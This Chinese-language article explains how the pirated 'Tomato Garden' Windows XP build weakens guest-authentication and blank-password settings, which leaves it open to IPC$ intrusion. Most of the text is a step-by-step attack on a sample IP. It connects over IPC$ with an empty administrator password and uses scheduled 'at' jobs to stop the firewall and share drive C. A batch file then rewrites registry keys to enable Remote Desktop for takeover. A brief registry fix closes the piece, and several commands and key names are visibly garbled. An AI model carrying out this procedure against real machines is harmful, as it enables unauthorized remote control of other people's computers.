從番茄花園看經典ＩＰＣ入侵

記得微軟有個廣告，說的是非授權軟件就像毒蛇一樣侵蝕著電腦里的重要文件。大家往往對此不以為然，但事實上，選用一些非授權，非原版的軟件確實會帶來這種問題，連廣受歡迎的番茄花園也不能避免。

Windows系列的操作系統都提供共享服務，這些共享服務的主要通道就是IPC。IPC是Internet ProcessConnection的簡稱，也稱共享命名管道，它是為了讓進程間通信而開放的命名管道，可以通過驗證用戶名和密碼獲得相應的權限，在遠程管理計算機和查看計算機的共享資源時使用。這種入侵方式在Windows 2000普及的年代非常流行。

默認情況下Windows系列的操作系統都支持空連接，空連接是在沒有信任的情況下與服務器建立的會話，換句話說，它是一個到服務器的匿名訪問。利用ipc$，連接者可以與目標主機建立一個空的連接而無需用戶名與密碼(當然，對方機器必須開了ipc$共享，否則你是連接不上的)，而XP系統限制了空連接導出用戶列表的功能，提高了安全性。

默認共享是系統安裝完畢后就自動開啟的共享，也叫管理共享，常被管理員用于遠程管理計算機。在Windows2000/XP及其以上版本中。默認開啟的共享有“c$”、“d$”、“admin$”、“ipc$”等，我們可以在“運行”對話框中輸入“\\\\計算機名\\盤符$”對這些資源進行訪問，以上這些共享就叫做默認共享。默認共享是只面向管理員組用戶開啟的共享，也就是說只有管理員組的用戶才能訪問這些共享，非管理員組用戶(即使是超級用戶)不能進行訪問。如果我們在對話框中輸入的不是管理員組用戶而是其他用戶組的賬戶和密碼(如guest組、backup operators組、power users組等)，系統是不會讓我們訪問該共享資源的。另外密碼不能為空，否則也連不上XP的默認共享。

通常是無法利用IPC入侵原版XP的，最主要的原因是XP與2000在來訪者的權限設置上是不同的，在XP中即使有管理員權限的用戶和密碼也不一定能建立聯接或復制文件。

身份驗證：XP默認是把從網絡登錄的所有用戶都按來賓賬戶處理的，因此即使管理員從網絡登錄也只具有來賓的權限，在XP的(secpol.msc)本地安全設置/本地策略/安全選項中：

網絡訪問：本地帳戶的共享和安全模式，有兩個選項：

經典_本地用戶以自己的身份驗證

僅來賓_本地用戶以來賓身份驗證

當番茄花園系統安裝完成后，所有的盤符默認共享自動關閉，遠程桌面關閉，Remote Registry服務關閉，系統只開了IPC$通信命名管道，administrator密碼為空，如果安全選項和空口令設置和原版相同，則系統也將是安全的，然而問題出來了，點開始/運行輸入secpol.msc，展開本地安全設置/本地策略/安全選項中的“網絡訪問：本地帳戶的共享和安全模式”，可以發現被改為“經典”。

空口令限制：在XP的注冊表中有一項limitblank.passworduse，它是用來限制空口令連接的

[HKEY_LOcAL_MAcHINE\\SYSTEM\\ControlSet001\\Control\\LsaJ]

“limitblankpassworduse”＝dword:00000001

很明顯看出來，通過導人注冊表來修改安全設置。

O:代表空密碼有效。1:代表空密碼無效。

系統默認是1，可以有效防止黑客人侵。

而在番茄花園系統中，點開始/運行輸入Regedit，展開[HKEY_LoCAL_MACHINE\\SYSTEM\\ControlSet001\\Control\\Lsa]發現limitblankpassworduse被改為O。這就意味著，黑客利用了XP管理員的弱口令。

入侵番茄花園版XP，需要針對XP系統的特點，開啟和關閉一些服務(假設目標IP是192.168.1.5)。

1)net use\\\\192.168.1.5\\IPC$\" \"/user:\"admintitrators\"。

看到“命令成功完成”提示，連接成功1

2)net time\\\\192.168.1.5

查查時間，發現192.168.1.5的當前時間是2007/5/6下午5:12，出現“命令成功完成”提示。

3)at\\\\192.168.1.5 17:14 net stop“Window$Firewall/Internet connection Sharing(ICS)”

用at命令啟動net stop關閉對方計算機中的Windows Firewall/Intemet Connection sharing(ICS)服務以利于關閉Windows防火墻。

4)執行at\\\\192.168.1.5檢查任務是否安排。

5)再次執行net time\\\\192.168.1.5獲得遠程機器時間。

發現192.168.1.5的當前時間是2007/5/6下午5:29，出現“命令成功完成”提示。

6)執行at 17:30\\\\192.168.1.5 net share diskc＝c:

開啟192.168.1.5的C盤共享。

7)打開我的電腦，輸入\\\\192.168.1.5\\diskc，新建一個文本文件，輸入以下內容

echo Windows Registry Editor Version 5.00>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlset\\Control\\Terminal server]>>3389.reg

echo\"fDenyTSConnections\"＝dword:00000000>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\cP]>>3389.reg

echo\"PortNumber\"＝dword:00000d3d>>3389.reg

echo[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcpl>>3389.reg

echo\"PortNumber\"＝dword:00000d3d>>3389.reg

regedit/s 3389.reg

del 3389.reg

將文件保存為3389.bat。

8)再次執行net time\\\\192.168.1.5獲得遠程機器時間，發現192.168.1.5的當前時間是2007/5/6下午6:29，出現“命令成功完成”提示。

9)執行at 18:30\\\\192.168.1.5c:\\3389.bat。

10)點“開始/所有程序/附件/通訊”，運行“遠程桌面連接”，輸入192.168.1.5即可遠程操作計算機了。

知道漏洞產生的原因后，修補起來也是相當的簡單，關鍵是修改注冊表中的limitblankpassworduse和forceguest的鍵值，將下面的內容保存為fix.reg，雙擊fix.reg，提示是否導入注冊表，點確認后即可修補漏洞。

Windows Registrv Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Lsa] \"forceguest\"＝dword:00000001 \"limitblankpassworduse\"＝dword:00000001